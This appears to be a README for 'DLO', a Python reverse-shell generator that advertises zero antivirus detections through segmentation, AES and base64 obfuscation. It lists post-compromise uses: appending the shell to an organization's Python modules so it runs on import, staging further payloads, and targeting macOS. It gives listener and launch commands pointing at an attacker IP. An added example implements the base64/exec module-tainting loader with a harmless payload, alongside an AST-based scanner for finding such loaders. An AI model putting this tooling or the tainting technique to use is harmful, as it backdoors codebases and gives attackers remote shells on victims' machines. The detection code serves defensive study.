Chang Tan, Lister Unlimited Cybersecurity Solutions, LLC.
DLO generates a Pythonic reverse shell that, as of July 29th, 2019, has zero detections on VirusTotal. It combines several techniques that will not be disclosed in detail, including but not limited to:
- Command segmentation (the command string is split into fragments)
- AES encryption with a 32-byte (256-bit) key and a 16-byte (128-bit) initialization vector, i.e. AES-256 (the AES block size fixes the IV at 16 bytes; a 32-byte key selects AES-256)
- Base64 encoding, needed so the encrypted bytes can be embedded in a plain-text Python source file
- Inline Python exec() calls, C inline asm() (to be added), Java/Jython, Cython and ctypes
See this link for a demonstration video of how to use it.
Currently, after gaining a foothold in an organization, you can:
- Run the payload standalone.
- Replace the proof-of-concept code with a Metasploit Python payload
- Taint/corrupt Python repositories: during a pentest, locate the organization's Python code repositories, copy the entire generated code and append it to the bottom of a Python module; the reverse shell then runs automatically whenever that module is imported or executed
- Use the payload as a stager to download additional payloads
- Use the payload against macOS hosts (MacBooks, iMacs, etc.), which ship with Python 2.7 preinstalled (true of the macOS releases current in 2019; Apple removed the bundled Python 2.7 in macOS 12.3)
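The following is an added example and is not DLO's own code. It shows the shape of the appended-loader technique behind the list above (command segmentation, base64 encoding and an exec() call that fires when the module runs) together with the check a defender would run over a source tree to find a tainted module. The AES layer is deliberately left out so the example runs on the standard library alone; PAYLOAD and BENIGN_MODULE are constructed stand-ins (the payload only sets a variable, it opens no connection), and every function name is this example's own.

```python
# Added example (not DLO's own code): a stdlib-only version of the appended-loader
# technique (segmentation + base64 + exec at import time, AES layer omitted) and an
# AST-based check that finds such a stanza in a source tree.
import ast
import base64
import pathlib

# Constructed stand-in for the reverse-shell source: it only sets a variable so the
# effect of auto-execution is observable without any network activity.
PAYLOAD = "import os\nMARKER = 'payload ran in ' + os.getcwd()\n"

# Constructed benign module that a pentester would append the loader to.
BENIGN_MODULE = "def add(a, b):\n    return a + b\n"


def segment(data: bytes, parts: int) -> list:
    """Split data into `parts` roughly equal chunks (the README's "command segmentation")."""
    size = -(-len(data) // parts)  # ceiling division
    return [data[i:i + size] for i in range(0, len(data), size)]


def build_stanza(source: str, parts: int = 4) -> str:
    """Emit a loader that rebuilds the payload from base64 chunks and exec()s it.

    Each chunk is decoded separately: base64 strings cannot simply be concatenated,
    because a chunk whose length is not a multiple of 3 carries '=' padding.
    """
    chunks = [base64.b64encode(c).decode() for c in segment(source.encode(), parts)]
    return (
        "\n# appended by tainting tool (constructed example)\n"
        "import base64 as _b\n"
        "_p = %r\n"
        "exec(b''.join(_b.b64decode(c) for c in _p))\n" % (chunks,)
    )


def taint(module_source: str, payload: str) -> str:
    """Append the loader so the payload runs whenever the module is imported or executed."""
    return module_source.rstrip("\n") + "\n" + build_stanza(payload)


def run_module(source: str) -> dict:
    """Execute module source in a fresh namespace and return it (stands in for `import`)."""
    ns = {"__name__": "tainted_module"}
    exec(compile(source, "<module>", "exec"), ns)
    return ns


# Decoder names that, when they feed exec()/eval(), mark an encoded loader.
_DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode", "decodebytes"}


def find_decoded_exec(source: str) -> list:
    """Line numbers of exec()/eval() calls whose argument is built from a base64-family decode."""
    try:
        tree = ast.parse(source)
    except SyntaxError:  # e.g. Python 2 only source; report nothing rather than crash
        return []
    hits = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval")):
            continue
        # Walk the whole call so aliasing (`_b.b64decode`) and generator wrappers are caught.
        for inner in ast.walk(node):
            if isinstance(inner, ast.Call):
                f = inner.func
                name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")
                if name in _DECODERS:
                    hits.append(node.lineno)
                    break
    return hits


def scan_tree(root: str) -> dict:
    """Map each .py file under root to the suspicious line numbers found in it."""
    findings = {}
    for path in pathlib.Path(root).rglob("*.py"):
        lines = find_decoded_exec(path.read_text(errors="replace"))
        if lines:
            findings[str(path)] = lines
    return findings


if __name__ == "__main__":
    tainted = taint(BENIGN_MODULE, PAYLOAD)
    print(tainted)
    print("MARKER =", run_module(tainted).get("MARKER"))
    print("suspicious lines:", find_decoded_exec(tainted))
```

Running the file prints the tainted module, shows that MARKER was set as a side effect of merely executing it, and reports the line of the exec() call. Point scan_tree at a checkout to sweep a whole repository. A loader that decrypts with AES before exec() would slip past this check unless its decrypt function is added to _DECODERS, which is why a production rule should flag any exec()/eval() whose argument is not a literal, not just decoder calls.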
Start a listener on the attacker host first (for example nc -lvnp <attacker listening port>), then run it as: python darklordobama.py <attacker IP> <attacker listening port>